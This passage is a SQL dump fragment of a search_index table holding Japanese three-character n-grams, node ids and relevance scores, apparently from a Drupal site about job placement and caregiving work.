('ーコメ', 193, 'ja', 'node_search', 1),
('ーコメ', 194, 'ja', 'node_search', 1),
('ーコメ', 195, 'ja', 'node_search', 1),
('ーコメ', 196, 'ja', 'node_search', 1),
('ーコメ', 197, 'ja', 'node_search', 1),
('ーコメ', 198, 'ja', 'node_search', 1),
('ーコメ', 199, 'ja', 'node_search', 1),
('ーコメ', 200, 'ja', 'node_search', 1),
('ーコン', 27, 'ja', 'node_search', 6.55554),
('ーシア', 23, 'ja', 'node_search', 0.532778),
('ーシア', 24, 'ja', 'node_search', 0.575885),
('ーシッ', 120, 'ja', 'node_search', 1),
('ーシュ', 27, 'ja', 'node_search', 5.06102),
('ーショ', 18, 'ja', 'node_search', 1),
('ーショ', 24, 'ja', 'node_search', 0.412762),
('ーショ', 27, 'ja', 'node_search', 0.427163),
('ーショ', 30, 'ja', 'node_search', 1),
('ーショ', 120, 'ja', 'node_search', 0.961087),
('ージの', 155, 'ja', 'node_search', 0.676032),
('ージへ', 185, 'ja', 'node_search', 1),
('ージェ', 11, 'ja', 'node_search', 19),
('ージェ', 17, 'ja', 'node_search', 1),
('ージェ', 19, 'ja', 'node_search', 1),
('ージェ', 23, 'ja', 'node_search', 2.0823),
('ージェ', 24, 'ja', 'node_search', 1.46543),
('ージェ', 27, 'ja', 'node_search', 1),
('ージェ', 135, 'ja', 'node_search', 2.41121),
('ージェ', 136, 'ja', 'node_search', 1.6916),
('ージェ', 138, 'ja', 'node_search', 1),
('ージェ', 154, 'ja', 'node_search', 1.84832),
('ージェ', 160, 'ja', 'node_search', 1.83938),
('ージェ', 161, 'ja', 'node_search', 1.8861),
('ージェ', 162, 'ja', 'node_search', 1.63167),
('ージェ', 163, 'ja', 'node_search', 1),
('ージェ', 164, 'ja', 'node_search', 1.81367),
('ージェ', 165, 'ja', 'node_search', 1.80545),
('ージェ', 166, 'ja', 'node_search', 1),
('ージェ', 167, 'ja', 'node_search', 1.88282),
('ージェ', 168, 'ja', 'node_search', 1),
('ージェ', 169, 'ja', 'node_search', 1),
('ージェ', 170, 'ja', 'node_search', 1),
('ージェ', 171, 'ja', 'node_search', 1),
('ージェ', 173, 'ja', 'node_search', 1.8249),
('ージェ', 174, 'ja', 'node_search', 1.77419),
('ージェ', 175, 'ja', 'node_search', 1.83353),
('ージェ', 176, 'ja', 'node_search', 1.80007),
('ージェ', 177, 'ja', 'node_search', 1),
('ージェ', 178, 'ja', 'node_search', 1),
('ージェ', 179, 'ja', 'node_search', 1.96109),
('ージェ', 180, 'ja', 'node_search', 1),
('ージェ', 184, 'ja', 'node_search', 1),
('ージェ', 185, 'ja', 'node_search', 1),
('ージェ', 186, 'ja', 'node_search', 1.92027),
('ージェ', 187, 'ja', 'node_search', 1),
('ージェ', 188, 'ja', 'node_search', 1),
('ージェ', 189, 'ja', 'node_search', 1),
('ージェ', 190, 'ja', 'node_search', 1),
('ージェ', 191, 'ja', 'node_search', 1),
('ージェ', 192, 'ja', 'node_search', 1),
('ージェ', 193, 'ja', 'node_search', 1),
('ージェ', 194, 'ja', 'node_search', 1),
('ージェ', 195, 'ja', 'node_search', 1),
('ージェ', 196, 'ja', 'node_search', 1),
('ージェ', 197, 'ja', 'node_search', 1),
('ージェ', 198, 'ja', 'node_search', 1),
('ージェ', 199, 'ja', 'node_search', 1),
('ージセ', 155, 'ja', 'node_search', 1),
('ースが', 62, 'ja', 'node_search', 4),
('ースで', 155, 'ja', 'node_search', 1),
('ースと', 28, 'ja', 'node_search', 3),
('ースの', 28, 'ja', 'node_search', 3),
('ースは', 155, 'ja', 'node_search', 0.794753),
('ースも', 3, 'ja', 'node_search', 0.562486),
('ースを', 24, 'ja', 'node_search', 0.491762),
('ースを', 142, 'ja', 'node_search', 0.857458),
('ース修', 62, 'ja', 'node_search', 0.687638),
('ース修', 136, 'ja', 'node_search', 0.813674),
('ース教', 62, 'ja', 'node_search', 1.1644),
('ース概', 155, 'ja', 'node_search', 3.73881),
('ーター', 24, 'ja', 'node_search', 0.380175),
('ーター', 30, 'ja', 'node_search', 2.84234),
('ータ入', 30, 'ja', 'node_search', 1.84234),
('ーダー', 120, 'ja', 'node_search', 1),
('ーチで', 136, 'ja', 'node_search', 1),
('ーチに', 138, 'ja', 'node_search', 1),
('ーチを', 9, 'ja', 'node_search', 3),
('ーチを', 17, 'ja', 'node_search', 4),
('ーチン', 142, 'ja', 'node_search', 0.681785),
('ーティ', 23, 'ja', 'node_search', 0.729424),
('ーディ', 11, 'ja', 'node_search', 19),
('ーディ', 17, 'ja', 'node_search', 1),
('ーディ', 19, 'ja', 'node_search', 1),
('ーディ', 23, 'ja', 'node_search', 1.43709),
('ーディ', 25, 'ja', 'node_search', 1),
('ーディ', 27, 'ja', 'node_search', 1),
('ーディ', 30, 'ja', 'node_search', 1),
('ーディ', 154, 'ja', 'node_search', 1.84832),
('ーディ', 160, 'ja', 'node_search', 1.83938),
('ーディ', 161, 'ja', 'node_search', 1.8861),
('ーディ', 162, 'ja', 'node_search', 1.63167),
('ーディ', 163, 'ja', 'node_search', 1),
('ーディ', 164, 'ja', 'node_search', 1.81367),
('ーディ', 165, 'ja', 'node_search', 1.80545),
('ーディ', 166, 'ja', 'node_search', 1),
('ーディ', 167, 'ja', 'node_search', 1.88282),
('ーディ', 168, 'ja', 'node_search', 1),
('ーディ', 169, 'ja', 'node_search', 1),
('ーディ', 170, 'ja', 'node_search', 1),
('ーディ', 171, 'ja', 'node_search', 1),
('ーディ', 173, 'ja', 'node_search', 1.8249),
('ーディ', 174, 'ja', 'node_search', 1.77419),
('ーディ', 175, 'ja', 'node_search', 1.83353),
('ーディ', 176, 'ja', 'node_search', 1.80007),
('ーディ', 177, 'ja', 'node_search', 1),
('ーディ', 178, 'ja', 'node_search', 1),
('ーディ', 179, 'ja', 'node_search', 1.96109),
('ーディ', 180, 'ja', 'node_search', 1),
('ーディ', 184, 'ja', 'node_search', 1),
('ーディ', 185, 'ja', 'node_search', 1),
('ーディ', 186, 'ja', 'node_search', 1.92027),
('ーディ', 187, 'ja', 'node_search', 1),
('ーディ', 188, 'ja', 'node_search', 1),
('ーディ', 189, 'ja', 'node_search', 1),
('ーディ', 190, 'ja', 'node_search', 1),
('ーディ', 191, 'ja', 'node_search', 1),
('ーディ', 192, 'ja', 'node_search', 1),
('ーディ', 193, 'ja', 'node_search', 1),
('ーディ', 194, 'ja', 'node_search', 1),
('ーディ', 195, 'ja', 'node_search', 1),
('ーディ', 196, 'ja', 'node_search', 1),
('ーディ', 197, 'ja', 'node_search', 1),
('ーディ', 198, 'ja', 'node_search', 1),
('ーディ', 199, 'ja', 'node_search', 1),
('ーディ', 200, 'ja', 'node_search', 1),
('ートさ', 164, 'ja', 'node_search', 1),
('ートさ', 167, 'ja', 'node_search', 1),
('ートさ', 169, 'ja', 'node_search', 0.997306),
('ートさ', 171, 'ja', 'node_search', 1),
('ートさ', 173, 'ja', 'node_search', 0.957226),
('ートさ', 174, 'ja', 'node_search', 1),
('ートさ', 176, 'ja', 'node_search', 1),
('ートさ', 177, 'ja', 'node_search', 1),
('ートし', 5, 'ja', 'node_search', 0.833529),
('ートし', 23, 'ja', 'node_search', 0.516879),
('ートし', 62, 'ja', 'node_search', 0.920273),
('ートし', 80, 'ja', 'node_search', 1),
('ートし', 186, 'ja', 'node_search', 0.854391),
('ートす', 1, 'ja', 'node_search', 0.968904),
('ートす', 138, 'ja', 'node_search', 0.664818),
('ートだ', 62, 'ja', 'node_search', 0.745294),
('ートで', 196, 'ja', 'node_search', 0.906287),
('ートな', 87, 'ja', 'node_search', 0.892724),
('ートを', 5, 'ja', 'node_search', 28),
('ートを', 154, 'ja', 'node_search', 1),
('ートを', 162, 'ja', 'node_search', 0.913226),
('ートア', 30, 'ja', 'node_search', 0.876337),
('ートセ', 27, 'ja', 'node_search', 5.16839),
('ートナ', 25, 'ja', 'node_search', 1),
('ート作', 24, 'ja', 'node_search', 0.866793),
('ート施', 155, 'ja', 'node_search', 1),
('ート的', 135, 'ja', 'node_search', 0.716357),
('ードに', 25, 'ja', 'node_search', 1),
('ードに', 26, 'ja', 'node_search', 1),
('ードを', 3, 'ja', 'node_search', 1),
('ードマ', 62, 'ja', 'node_search', 1.15455),
('ーニュ', 23, 'ja', 'node_search', 1),
('ーニン', 24, 'ja', 'node_search', 1.65551),
('ーニン', 62, 'ja', 'node_search', 0.729424),
('ーニン', 133, 'ja', 'node_search', 0.754681),
('ーニン', 136, 'ja', 'node_search', 1),
('ービス', 1, 'ja', 'node_search', 1),
('ービス', 7, 'ja', 'node_search', 1.8861),
('ービス', 23, 'ja', 'node_search', 2),
('ービス', 24, 'ja', 'node_search', 1.33721),
('ービス', 27, 'ja', 'node_search', 5.56706),
('ービス', 68, 'ja', 'node_search', 1),
('ービス', 162, 'ja', 'node_search', 0.827757),
('ープの', 23, 'ja', 'node_search', 1.75707),
('ープ企', 27, 'ja', 'node_search', 1),
('ープ活', 135, 'ja', 'node_search', 1),
('ープ活', 138, 'ja', 'node_search', 1),
('ーミッ', 30, 'ja', 'node_search', 0.902857),
('ームレ', 135, 'ja', 'node_search', 0.705825),
('ーヤー', 23, 'ja', 'node_search', 1),
('ーヤー', 27, 'ja', 'node_search', 1.65755),
('ーラミ', 24, 'ja', 'node_search', 0.352969),
('ールで', 30, 'ja', 'node_search', 28),
('ールの', 5, 'ja', 'node_search', 3),
('ールを', 3, 'ja', 'node_search', 0.537506),
('ールス', 27, 'ja', 'node_search', 5.16839),
('ールド', 5, 'ja', 'node_search', 1),
('ールプ', 135, 'ja', 'node_search', 0.972861),
('ーワデ', 27, 'ja', 'node_search', 1.65755),
('ーンを', 3, 'ja', 'node_search', 0.980874),
('ーンシ', 116, 'ja', 'node_search', 20),
('ーンシ', 122, 'ja', 'node_search', 20),
('ーン自', 27, 'ja', 'node_search', 0.328616),
('ー人材', 154, 'ja', 'node_search', 0.827757),
('ー人材', 160, 'ja', 'node_search', 0.813674),
('ー人材', 161, 'ja', 'node_search', 0.857458),
('ー人材', 164, 'ja', 'node_search', 0.78951),
('ー人材', 165, 'ja', 'node_search', 0.786915),
('ー人材', 167, 'ja', 'node_search', 0.860547),
('ー人材', 173, 'ja', 'node_search', 0.800068),
('ー人材', 174, 'ja', 'node_search', 0.757065),
('ー人材', 175, 'ja', 'node_search', 0.808176),
('ー人材', 176, 'ja', 'node_search', 0.776703),
('ー人材', 179, 'ja', 'node_search', 0.934703),
('ー全国', 23, 'ja', 'node_search', 0.635),
('ー全国', 24, 'ja', 'node_search', 1),
('ー地方', 27, 'ja', 'node_search', 0.968904),
('ー学校', 24, 'ja', 'node_search', 0.379004),
('ー建築', 23, 'ja', 'node_search', 0.722831),
('ー文法', 62, 'ja', 'node_search', 0.550958),
('ー聴解', 62, 'ja', 'node_search', 1.12537),
('ー職員', 27, 'ja', 'node_search', 0.37157),
('ー読解', 62, 'ja', 'node_search', 1.1281),
('ー連合', 27, 'ja', 'node_search', 0.949597),
('一つで', 27, 'ja', 'node_search', 0.489781),
('一つで', 162, 'ja', 'node_search', 0.816452),
('一戸建', 163, 'ja', 'node_search', 0.766757),
('一歩で', 180, 'ja', 'node_search', 0.942091),
('一歩で', 186, 'ja', 'node_search', 0.980874),
('一歩で', 192, 'ja', 'node_search', 0.942091),
('一歩で', 196, 'ja', 'node_search', 0.953396),
('一歩と', 160, 'ja', 'node_search', 0.997306),
('一歩と', 161, 'ja', 'node_search', 1),
('一歩と', 168, 'ja', 'node_search', 0.810915),
('一歩と', 170, 'ja', 'node_search', 0.794753),
('一歩と', 174, 'ja', 'node_search', 0.909743),
('一歩と', 178, 'ja', 'node_search', 1),
('一歩と', 181, 'ja', 'node_search', 0.909743),
('一歩と', 185, 'ja', 'node_search', 1),
('一歩と', 187, 'ja', 'node_search', 1),
('一歩と', 191, 'ja', 'node_search', 0.913226),
('一歩と', 193, 'ja', 'node_search', 1),
('一歩と', 197, 'ja', 'node_search', 1),
('一歩を', 175, 'ja', 'node_search', 1),
('一歩を', 177, 'ja', 'node_search', 0.879565),
('一歩を', 184, 'ja', 'node_search', 0.896076),
('一歩を', 190, 'ja', 'node_search', 0.949597),
('一生懸', 77, 'ja', 'node_search', 4),
('一生懸', 87, 'ja', 'node_search', 2.2473),
('一生懸', 98, 'ja', 'node_search', 1),
('一般労', 5, 'ja', 'node_search', 3),
('一部で', 23, 'ja', 'node_search', 1.75707),
('一部と', 24, 'ja', 'node_search', 0.749958),
('一部は', 27, 'ja', 'node_search', 0.824901),
('丁寧に', 87, 'ja', 'node_search', 0.96498),
('丁寧に', 133, 'ja', 'node_search', 1),
('上が残', 8, 'ja', 'node_search', 2),
('上げま', 133, 'ja', 'node_search', 0.78951),
('上げま', 154, 'ja', 'node_search', 1),
('上げま', 156, 'ja', 'node_search', 0.961087),
('上げま', 157, 'ja', 'node_search', 0.848323),
('上げま', 169, 'ja', 'node_search', 0.797402),
('上げま', 171, 'ja', 'node_search', 0.784336),
('上げま', 176, 'ja', 'node_search', 0.805455),
('上げま', 177, 'ja', 'node_search', 0.718502),
('上げま', 178, 'ja', 'node_search', 0.786915),
('上げま', 195, 'ja', 'node_search', 0.810915),
('上げる', 160, 'ja', 'node_search', 0.906287),
('上げる', 161, 'ja', 'node_search', 0.961087),
('上げる', 164, 'ja', 'node_search', 0.934703),
('上げる', 166, 'ja', 'node_search', 0.945829),
('上げる', 168, 'ja', 'node_search', 0.949597),
('上げる', 170, 'ja', 'node_search', 0.961087),
('上げる', 179, 'ja', 'node_search', 0.781775),
('上げる', 180, 'ja', 'node_search', 0.863659),
('上げる', 181, 'ja', 'node_search', 0.866793),
('上げる', 185, 'ja', 'node_search', 0.822065),
('上げる', 186, 'ja', 'node_search', 0.810915),
('上げる', 188, 'ja', 'node_search', 0.819249),
('上げる', 189, 'ja', 'node_search', 0.836446),
('上げる', 191, 'ja', 'node_search', 0.873132),
('上げる', 192, 'ja', 'node_search', 0.836446),
('上げる', 193, 'ja', 'node_search', 0.854391),
('上げる', 196, 'ja', 'node_search', 0.860547),
('上げる', 198, 'ja', 'node_search', 0.836446),
('上げる', 199, 'ja', 'node_search', 0.836446),
('上させ', 87, 'ja', 'node_search', 0.822065),
('上とご', 182, 'ja', 'node_search', 0.879565),
('上の人', 23, 'ja', 'node_search', 0.668514),
('上の合', 24, 'ja', 'node_search', 0.71),
('上の学', 10, 'ja', 'node_search', 1),
('上の方', 19, 'ja', 'node_search', 28),
('上の方', 163, 'ja', 'node_search', 1),
('上の機', 198, 'ja', 'node_search', 0.945829),
('上の経', 7, 'ja', 'node_search', 1.81715),
('上の経', 133, 'ja', 'node_search', 1),
('上を証', 181, 'ja', 'node_search', 1),
('上を証', 182, 'ja', 'node_search', 1),
('上を証', 183, 'ja', 'node_search', 1),
('上司の', 120, 'ja', 'node_search', 19),
('上手に', 18, 'ja', 'node_search', 0.938382),
('上記の', 24, 'ja', 'node_search', 0.488796),
('上記の', 27, 'ja', 'node_search', 0.697623),
('下で健', 18, 'ja', 'node_search', 1),
('下で訓', 23, 'ja', 'node_search', 0.562486),
('下のよ', 155, 'ja', 'node_search', 0.784336),
('下のカ', 7, 'ja', 'node_search', 1.8861),
('下の支', 27, 'ja', 'node_search', 1),
('下の熟', 30, 'ja', 'node_search', 28),
('下の通', 27, 'ja', 'node_search', 1.18858),
('下の通', 157, 'ja', 'node_search', 1),
('不安を', 138, 'ja', 'node_search', 0.848323),
('不思議', 3, 'ja', 'node_search', 0.740689),
('不注意', 87, 'ja', 'node_search', 0.729424),
('与えら', 7, 'ja', 'node_search', 1.8861),
('与され', 62, 'ja', 'node_search', 0.652202),
('与含む', 162, 'ja', 'node_search', 0.712106),
('世界を', 62, 'ja', 'node_search', 0.497805),
('両方で', 27, 'ja', 'node_search', 0.471741),
('両方の', 136, 'ja', 'node_search', 1),
('両親を', 80, 'ja', 'node_search', 1),
('両面で', 177, 'ja', 'node_search', 0.747619),
('中で多', 169, 'ja', 'node_search', 0.957226),
('中で最', 23, 'ja', 'node_search', 1),
('了しま', 133, 'ja', 'node_search', 0.916736),
('了する', 142, 'ja', 'node_search', 0.845322),
('了時に', 62, 'ja', 'node_search', 0.681785),
('予定で', 142, 'ja', 'node_search', 0.913226),
('事がな', 24, 'ja', 'node_search', 0.523573),
('事が充', 164, 'ja', 'node_search', 0.896076),
('事が充', 171, 'ja', 'node_search', 0.896076),
('事が充', 174, 'ja', 'node_search', 0.873132),
('事が始', 175, 'ja', 'node_search', 0.961087),
('事が実', 165, 'ja', 'node_search', 0.854391),
('事が順', 154, 'ja', 'node_search', 0.972861),
('事して', 27, 'ja', 'node_search', 0.375535),
('事する', 7, 'ja', 'node_search', 1.8861),
('事であ', 87, 'ja', 'node_search', 0.646943),
('事です', 162, 'ja', 'node_search', 0.892724),
('事で来', 87, 'ja', 'node_search', 16),
('事と生', 177, 'ja', 'node_search', 0.759465),
('事と生', 184, 'ja', 'node_search', 0.810915),
('事にお', 87, 'ja', 'node_search', 1),
('事には', 189, 'ja', 'node_search', 1),
('事にも', 116, 'ja', 'node_search', 1),
('事に備', 87, 'ja', 'node_search', 0.774192),
('事に取', 69, 'ja', 'node_search', 1),
('事に就', 68, 'ja', 'node_search', 1),
('事に献', 80, 'ja', 'node_search', 1),
('事のた', 73, 'ja', 'node_search', 1),
('事のよ', 77, 'ja', 'node_search', 4),
('事のチ', 24, 'ja', 'node_search', 0.502958),
('事の一', 27, 'ja', 'node_search', 0.830633),
('事の依', 69, 'ja', 'node_search', 0.997306),
('事の機', 28, 'ja', 'node_search', 1),
('事の準', 162, 'ja', 'node_search', 0.78951),
('事の紹', 23, 'ja', 'node_search', 0.545988),
('事の紹', 24, 'ja', 'node_search', 0.625114),
('事は自', 5, 'ja', 'node_search', 1),
('事への', 177, 'ja', 'node_search', 0.892724),
('事やサ', 7, 'ja', 'node_search', 1.8861),
('事や文', 87, 'ja', 'node_search', 1),
('事をご', 162, 'ja', 'node_search', 1),
('事をし', 87, 'ja', 'node_search', 0.942091),
('事をす', 133, 'ja', 'node_search', 1),
('事を自', 77, 'ja', 'node_search', 4),
('事を行', 27, 'ja', 'node_search', 0.552215),
('事を見', 3, 'ja', 'node_search', 0.581429),
('事を見', 23, 'ja', 'node_search', 0.489781),
('事を選', 87, 'ja', 'node_search', 1),
('事チャ', 23, 'ja', 'node_search', 0.423467),
('事業と', 27, 'ja', 'node_search', 0.337562),
('事業を', 23, 'ja', 'node_search', 0.833529),
('事業を', 27, 'ja', 'node_search', 1.52471),
('事業内', 24, 'ja', 'node_search', 27),
('事監督', 27, 'ja', 'node_search', 0.59873),
('事紹介', 24, 'ja', 'node_search', 1),
('事終了', 133, 'ja', 'node_search', 0.923838),
('事項で', 98, 'ja', 'node_search', 0.993146),
('事項は', 138, 'ja', 'node_search', 0.72066),
('二人の', 176, 'ja', 'node_search', 0.879565),
('二人は', 176, 'ja', 'node_search', 1),
('二人は', 184, 'ja', 'node_search', 1),
('互尊重', 25, 'ja', 'node_search', 1),
('交通手', 5, 'ja', 'node_search', 0.869951),
('交通機', 23, 'ja', 'node_search', 0.923838),
('交通総', 27, 'ja', 'node_search', 0.745294),
('交通費', 18, 'ja', 'node_search', 1),
('京での', 113, 'ja', 'node_search', 1),
('京の大', 77, 'ja', 'node_search', 4),
('京へ出', 73, 'ja', 'node_search', 1),
('京市に', 134, 'ja', 'node_search', 1),
('京市に', 144, 'ja', 'node_search', 1),
('人たち', 23, 'ja', 'node_search', 0.595774),
('人です', 162, 'ja', 'node_search', 1),
('人です', 163, 'ja', 'node_search', 1.96498),
('人にと', 164, 'ja', 'node_search', 1),
('人にと', 171, 'ja', 'node_search', 1),
('人にと', 174, 'ja', 'node_search', 1),
('人にと', 177, 'ja', 'node_search', 1),
('人に対', 7, 'ja', 'node_search', 28.8861),
('人のた', 5, 'ja', 'node_search', 3),
('人のネ', 133, 'ja', 'node_search', 1),
('人の今', 176, 'ja', 'node_search', 0.876337),
('人の努', 160, 'ja', 'node_search', 1),
('人の努', 161, 'ja', 'node_search', 1),
('人の努', 166, 'ja', 'node_search', 1),
('人の努', 168, 'ja', 'node_search', 1),
('人の努', 170, 'ja', 'node_search', 1),
('人の努', 179, 'ja', 'node_search', 1),
('人の努', 180, 'ja', 'node_search', 1),
('人の努', 185, 'ja', 'node_search', 1),
('人の努', 188, 'ja', 'node_search', 1),
('人の努', 191, 'ja', 'node_search', 1),
('人の努', 194, 'ja', 'node_search', 1),
('人の努', 196, 'ja', 'node_search', 1),
('人の努', 197, 'ja', 'node_search', 1),
('人の努', 198, 'ja', 'node_search', 1),
('人の姉', 69, 'ja', 'node_search', 1),
('人の学', 195, 'ja', 'node_search', 1),
('人の幼', 80, 'ja', 'node_search', 4),
('人の強', 186, 'ja', 'node_search', 1),
('人の従', 23, 'ja', 'node_search', 0.794753),
('人の従', 77, 'ja', 'node_search', 1),
('人の熱', 199, 'ja', 'node_search', 1),
('人の粘', 192, 'ja', 'node_search', 1),
('人の自', 193, 'ja', 'node_search', 1),
('人の言', 87, 'ja', 'node_search', 1),
('人は介', 162, 'ja', 'node_search', 1),
('人は日', 184, 'ja', 'node_search', 1),
('人を募', 8, 'ja', 'node_search', 2),
('人を支', 189, 'ja', 'node_search', 1),
('人事業', 27, 'ja', 'node_search', 0.338023),
('人以上', 19, 'ja', 'node_search', 28),
('人以上', 23, 'ja', 'node_search', 0.672252),
('人住宅', 27, 'ja', 'node_search', 0.483934),
('人募集', 163, 'ja', 'node_search', 4),
('人数は', 163, 'ja', 'node_search', 0.652202),
('人数制', 138, 'ja', 'node_search', 0.76431),
('人材と', 154, 'ja', 'node_search', 0.902857),
('人材と', 160, 'ja', 'node_search', 0.810915),
('人材と', 170, 'ja', 'node_search', 0.839384),
('人材と', 179, 'ja', 'node_search', 0.931053),
('人材の', 154, 'ja', 'node_search', 0.824901),
('人材の', 161, 'ja', 'node_search', 0.854391),
('人材の', 162, 'ja', 'node_search', 1),
('人材の', 164, 'ja', 'node_search', 0.786915),
('人材の', 165, 'ja', 'node_search', 0.784336),
('人材の', 167, 'ja', 'node_search', 0.857458),
('人材の', 173, 'ja', 'node_search', 0.797402),
('人材の', 174, 'ja', 'node_search', 0.754681),
('人材の', 175, 'ja', 'node_search', 0.805455),
('人材の', 176, 'ja', 'node_search', 0.774192),
('人材は', 155, 'ja', 'node_search', 0.836446),
('人材を', 163, 'ja', 'node_search', 1),
('人材紹', 23, 'ja', 'node_search', 0.664818),
('人船員', 27, 'ja', 'node_search', 0.347025),
('今すぐ', 62, 'ja', 'node_search', 0.491762),
('今回の', 160, 'ja', 'node_search', 1),
('今回の', 165, 'ja', 'node_search', 1),
('今回の', 166, 'ja', 'node_search', 1),
('今回の', 168, 'ja', 'node_search', 1),
('今回の', 170, 'ja', 'node_search', 1),
('今回の', 174, 'ja', 'node_search', 1),
('今回の', 178, 'ja', 'node_search', 1),
('今回の', 179, 'ja', 'node_search', 1),
('今回の', 180, 'ja', 'node_search', 1),
('今回の', 181, 'ja', 'node_search', 1),
('今回の', 182, 'ja', 'node_search', 1),
('今回の', 183, 'ja', 'node_search', 1),
('今回の', 184, 'ja', 'node_search', 1),
('今回の', 185, 'ja', 'node_search', 1),
('今回の', 186, 'ja', 'node_search', 1),
('今回の', 187, 'ja', 'node_search', 1),
('今回の', 188, 'ja', 'node_search', 1),
('今回の', 189, 'ja', 'node_search', 1.89272),
('今回の', 190, 'ja', 'node_search', 1),
('今回の', 191, 'ja', 'node_search', 1),
('今回の', 192, 'ja', 'node_search', 1),
('今回の', 193, 'ja', 'node_search', 1),
('今回の', 194, 'ja', 'node_search', 1.94209),
('今回の', 195, 'ja', 'node_search', 1),
('今回の', 196, 'ja', 'node_search', 1),
('今回の', 197, 'ja', 'node_search', 1.9347),
('今回の', 198, 'ja', 'node_search', 1),
('今回の', 199, 'ja', 'node_search', 1),
('今後さ', 192, 'ja', 'node_search', 0.931053),
('今後の', 160, 'ja', 'node_search', 0.889397),
('今後の', 161, 'ja', 'node_search', 1.72643),
('今後の', 166, 'ja', 'node_search', 0.927431),
('今後の', 168, 'ja', 'node_search', 0.931053),
('今後の', 169, 'ja', 'node_search', 0.857458),
('今後の', 170, 'ja', 'node_search', 0.942091),
('今後の', 171, 'ja', 'node_search', 0.836446),
('今後の', 176, 'ja', 'node_search', 0.869951),
('今後の', 178, 'ja', 'node_search', 0.961087),
('今後の', 179, 'ja', 'node_search', 0.776703),
('今後の', 180, 'ja', 'node_search', 0.934703),
('今後の', 181, 'ja', 'node_search', 0.851346),
('今後の', 185, 'ja', 'node_search', 0.876337),
('今後の', 186, 'ja', 'node_search', 1.88918),
('今後の', 187, 'ja', 'node_search', 0.873132),
('今後の', 190, 'ja', 'node_search', 0.916736),
('今後の', 191, 'ja', 'node_search', 0.857458),
('今後の', 193, 'ja', 'node_search', 0.839384),
('今後の', 194, 'ja', 'node_search', 0.892724),
('今後の', 195, 'ja', 'node_search', 0.869951),
('今後の', 198, 'ja', 'node_search', 1.7495),
('今後の', 199, 'ja', 'node_search', 0.916736),
('今後も', 80, 'ja', 'node_search', 1),
('今後も', 154, 'ja', 'node_search', 0.848323);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('今後も', 165, 'ja', 'node_search', 0.805455),
('今後も', 167, 'ja', 'node_search', 0.882818),
('今後も', 174, 'ja', 'node_search', 0.774192),
('今後も', 179, 'ja', 'node_search', 0.961087),
('今後も', 182, 'ja', 'node_search', 0.906287),
('今後も', 183, 'ja', 'node_search', 0.876337),
('介いた', 162, 'ja', 'node_search', 1),
('介に成', 23, 'ja', 'node_search', 0.659351),
('介をし', 24, 'ja', 'node_search', 1),
('介を行', 23, 'ja', 'node_search', 0.542319),
('介を行', 24, 'ja', 'node_search', 0.621888),
('介護の', 136, 'ja', 'node_search', 1),
('介護の', 141, 'ja', 'node_search', 1),
('介護の', 162, 'ja', 'node_search', 1),
('介護の', 170, 'ja', 'node_search', 0.854391),
('介護の', 188, 'ja', 'node_search', 1),
('介護の', 189, 'ja', 'node_search', 1),
('介護サ', 162, 'ja', 'node_search', 0.836446),
('介護ス', 162, 'ja', 'node_search', 31),
('介護ビ', 24, 'ja', 'node_search', 0.384332),
('介護人', 162, 'ja', 'node_search', 1),
('介護分', 165, 'ja', 'node_search', 1),
('介護分', 169, 'ja', 'node_search', 1),
('介護分', 170, 'ja', 'node_search', 5),
('介護分', 171, 'ja', 'node_search', 1),
('介護分', 178, 'ja', 'node_search', 1.83353),
('介護分', 188, 'ja', 'node_search', 1),
('介護分', 189, 'ja', 'node_search', 1),
('介護施', 136, 'ja', 'node_search', 0.78951),
('介護施', 162, 'ja', 'node_search', 1),
('介護求', 162, 'ja', 'node_search', 1),
('介護現', 188, 'ja', 'node_search', 0.906287),
('介護経', 162, 'ja', 'node_search', 0.653974),
('介護職', 121, 'ja', 'node_search', 1),
('介護関', 24, 'ja', 'node_search', 1.24218),
('仕事が', 154, 'ja', 'node_search', 0.976851),
('仕事が', 164, 'ja', 'node_search', 0.899454),
('仕事が', 165, 'ja', 'node_search', 0.857458),
('仕事が', 171, 'ja', 'node_search', 0.899454),
('仕事が', 174, 'ja', 'node_search', 0.876337),
('仕事が', 175, 'ja', 'node_search', 0.96498),
('仕事で', 87, 'ja', 'node_search', 16.6469),
('仕事で', 162, 'ja', 'node_search', 0.896076),
('仕事と', 177, 'ja', 'node_search', 0.76188),
('仕事と', 184, 'ja', 'node_search', 0.813674),
('仕事に', 68, 'ja', 'node_search', 1),
('仕事に', 69, 'ja', 'node_search', 1),
('仕事に', 80, 'ja', 'node_search', 1),
('仕事に', 87, 'ja', 'node_search', 1.77419),
('仕事に', 189, 'ja', 'node_search', 1),
('仕事の', 23, 'ja', 'node_search', 0.547222),
('仕事の', 24, 'ja', 'node_search', 1.1297),
('仕事の', 28, 'ja', 'node_search', 1),
('仕事の', 69, 'ja', 'node_search', 1),
('仕事の', 73, 'ja', 'node_search', 1),
('仕事の', 77, 'ja', 'node_search', 4),
('仕事は', 188, 'ja', 'node_search', 1),
('仕事へ', 177, 'ja', 'node_search', 0.896076),
('仕事や', 7, 'ja', 'node_search', 1.8861),
('仕事や', 87, 'ja', 'node_search', 1),
('仕事を', 3, 'ja', 'node_search', 0.582831),
('仕事を', 23, 'ja', 'node_search', 0.490769),
('仕事を', 77, 'ja', 'node_search', 4),
('仕事を', 87, 'ja', 'node_search', 1.94209),
('仕事を', 162, 'ja', 'node_search', 1),
('仕事チ', 23, 'ja', 'node_search', 0.424201),
('仕事紹', 24, 'ja', 'node_search', 1),
('仕入れ', 27, 'ja', 'node_search', 0.319324),
('他の共', 24, 'ja', 'node_search', 0.347025),
('他の周', 24, 'ja', 'node_search', 0.360175),
('他国内', 27, 'ja', 'node_search', 0.595774),
('付き添', 162, 'ja', 'node_search', 0.733888),
('付けて', 77, 'ja', 'node_search', 4),
('付けま', 142, 'ja', 'node_search', 0.7017),
('付ける', 138, 'ja', 'node_search', 0.906287),
('付ける', 140, 'ja', 'node_search', 0.889397),
('代理店', 142, 'ja', 'node_search', 0.886095),
('代表し', 133, 'ja', 'node_search', 0.819249),
('以上が', 8, 'ja', 'node_search', 2),
('以上の', 7, 'ja', 'node_search', 1.8208),
('以上の', 10, 'ja', 'node_search', 1),
('以上の', 19, 'ja', 'node_search', 28),
('以上の', 23, 'ja', 'node_search', 0.670377),
('以上の', 24, 'ja', 'node_search', 0.712106),
('以上の', 133, 'ja', 'node_search', 1),
('以上の', 163, 'ja', 'node_search', 1),
('以下で', 18, 'ja', 'node_search', 1),
('以下の', 7, 'ja', 'node_search', 1.8861),
('以下の', 27, 'ja', 'node_search', 2.18858),
('以下の', 30, 'ja', 'node_search', 28),
('以下の', 154, 'ja', 'node_search', 1),
